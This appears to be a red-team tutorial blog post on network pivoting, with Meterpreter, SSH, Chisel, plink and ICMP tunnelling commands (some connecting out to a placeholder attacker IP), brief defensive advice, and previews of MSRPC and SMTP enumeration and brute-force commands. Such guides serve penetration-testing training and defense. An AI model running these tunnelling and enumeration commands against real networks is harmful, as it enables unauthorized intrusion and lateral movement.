Skip to main content

Pivoting Commands

Pivoting for Red Teamers

Pivoting in Red Team Operations: A Complete Guide

Introduction

In a real-world red team operation, gaining initial access is just the beginning. The real challenge is pivoting—the ability to move laterally, escalate privileges, and compromise additional systems within the network.

What is Pivoting?

Pivoting is a technique used to route traffic through a compromised host to access internal networks that are not directly reachable.

Types of Pivoting

  • Network Pivoting: Routes network traffic through a compromised host (e.g., SSH Tunneling, Metasploit, ProxyChains).
  • Port Forwarding: Exposes specific ports from an internal machine to the attacker (e.g., SSH Local Port Forwarding).

Step 1: Pivoting Using Metasploit

Setting Up a Pivot via Meterpreter

meterpreter> background
run autoroute -s 192.168.1.0/24

Now, all traffic destined for 192.168.1.0/24 will be routed through this compromised host.

Step 2: Pivoting with SSH Tunneling

Using Local Port Forwarding

ssh -L 8080:192.168.1.100:80 user@pivot-host

Using Dynamic Port Forwarding (SOCKS Proxy)

ssh -D 9050 user@pivot-host

Step 3: Pivoting with Chisel

Setup on Attacker Machine

./chisel server --reverse --port 8080

Setup on Compromised Host

./chisel client <attacker-ip>:8080 R:1080:socks

Step 4: Pivoting with RDP (Remote Desktop Protocol)

plink.exe -ssh -L 3389:192.168.1.100:3389 user@pivot-host

Step 5: Exploiting Firewall Rules with ICMP Tunnel

Start ICMP Server on Attacker Machine

./icmp-server eth0

Start ICMP Client on Compromised Host

./icmp-client <attacker-ip>

How to Defend Against Pivoting Attacks

  • Segment Networks – Isolate DMZ, internal, and user networks.
  • Use Firewalls – Block unnecessary outbound traffic.
  • Monitor SOCKS & Proxy Usage – Detect unusual traffic.
  • Implement EDR Solutions – Detect tunneling and backdoors.
  • Disable Unused Services – Prevent lateral movement.

Conclusion

Pivoting is a critical skill for red teamers, allowing attackers to move deeper into a network after initial access.

⚠️ Reminder: These techniques should only be used for legal penetration testing and red team assessments.

The above code can be automated via customer script

Comments

Post a Comment

Popular posts from this blog

MSRPC (Microsoft Remote Procedure Call) Pentesting - Port 135

  It is also known as a function call or a subroutine call. Default ports are 135, 593. Enumeration nmap --script msrpc-enum -p 135 <target-ip> RPC Endpoints To enumerate RPC endpoints, use impacket-rpcdump. impacket-rpcdump -port 135 <target-ip> | grep -E 'MS-EFSRPC|MS-RPRN|MS-PAR' MS-EFSRPC: It might be vulnerable to PetitPotam. MS-RPRN, MS-PAR: It might be vulnerable to PrintNightmare. Metasploit msfconsole msf> use auxiliary/scanner/dcerpc/endpoint_mapper msf> use auxiliary/scanner/dcerpc/hidden msf> use auxiliary/scanner/dcerpc/management msf> use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor Connect # Anonymous logon rpcclient -N -U "" <target-ip> rpcclient -N -U "" -p 593 <target-ip> rpcclient -N -U "" dc.example.local # Specify username # -W: Workgroup # -N: No password rpcclient -U username <target-ip> rpcclient -W WORKGROUP -U username <target-ip> rpcclient -U username -N <target-ip...
Post a Comment
Read more

Thread Modelling Cheatsheet: Know Your Weaknesses Before Attackers Do!

Threat Modelling Part - 1 What is Threat Modelling?      Threat modelling is the process of identifying, assessing, and mitigating potential security threats before they happen. It helps teams anticipate how systems can be attacked and build defences proactively , not reactively. Key Concepts Threat: Something (like a hacker or malware) that could exploit a weakness. Vulnerability: A flaw in your system that can be exploited. Risk: The chance that a threat will exploit a vulnerability to cause damage. Analogy : Threat = Burglar Vulnerability = Unlocked door Risk = Getting robbed because the door is open in a bad neighborhood  Threat Modelling Process (High-Level) Define the Scope – What systems/apps are you evaluating? Identify Assets – What needs protection? (e.g. data, services) Identify Threats – Think like an attacker. What could go wrong? Analyze Vulnerabilities – What weaknesses exist? Prioritize Ri...
Post a Comment
Read more

SMTP (Simple Mail Transfer Protocol) Pentesting - Port 25

 SMTP (Simple Mail Transfer Protocol) is a communication protocol for electronic mail transmission.it is used for sending e-mail. POP3 or IMAP are used for receiving e-mail. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS)   Connect We can use Telnet to connect to the remote server. Here is a command using Telnet: telnet example.com 25 Enumeration Identifying a SMTP Server You can use Nmap to check if there's an Telnet server on a target host like this: nmap -p25,465,587 -sV -Pn target.com Additional Nmap commands for enumeration nmap --script smtp-brute -p 25,465,587 "target-ip" nmap --script smtp-commands -p 25,465,587 "target-ip" nmap --script smtp-enum-users -p 25,465,587 "target-ip" nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 "target-ip" nmap --script smtp-vuln-cve2011-1764 -p 25,465,587 "target-ip" nmap --script smtp-* -p 25,465,587 "target-ip" Enumer...
Post a Comment
Read more